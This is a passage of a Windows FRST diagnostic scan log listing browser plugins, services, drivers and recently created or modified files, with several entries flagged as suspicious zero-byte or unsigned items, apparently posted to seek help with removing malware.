FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5217992 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX)
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-24 19:50 - 2019-11-24 19:50 - 000000000 ____D C:\FRST
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-24 19:50 - 2019-08-14 11:29 - 000064693 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-24 19:38 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-24 19:16 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-24 19:16 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-24 19:16 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-24 19:16 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-24 19:14 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-24 19:12 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-24 19:12 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-24 19:12 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-24 19:12 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-24 19:12 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-24 19:11 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-24 19:07 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-11-24 19:07 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:51 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 18:20 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-24 17:01 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
